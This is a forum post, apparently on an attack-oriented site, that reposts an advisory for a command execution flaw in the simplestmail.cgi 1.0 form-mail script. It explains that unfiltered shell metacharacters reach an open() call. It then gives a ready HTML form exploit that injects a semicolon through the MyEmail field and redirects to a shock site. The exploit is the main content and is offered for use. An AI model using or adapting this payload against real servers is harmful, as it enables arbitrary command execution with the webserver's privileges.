Jump to content
DarkLegion

Leif M. Wright simplestmail.cgi 1.0 Remote Command Execution Vulnerability

Recommended Posts

Posted

source: Leif M. Wright simplestmail.cgi Remote Command Execution Vulnerability

A vulnerabiliy exists in Leif M. Wright's simplestmail.cgi, a script designed to coordinate email responses from web forms.

An insecurely-structured call to the open() function leads to a failure to properly filter shell metacharacters from user supplied input. As a result, it is possible for an attacker to cause this script to execute arbitrary shell commands with the privilege of the webserver.

<html>

<form action="http://someplace/cgi-bin/simplestmail.cgi" method=POST>

Command: <input type=text name=MyEmail value=";">

<input type=hidden name=redirect value="http://goatse.cx">

<input type=submit name=submit value="run">

</form>

</html>

SURSA

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...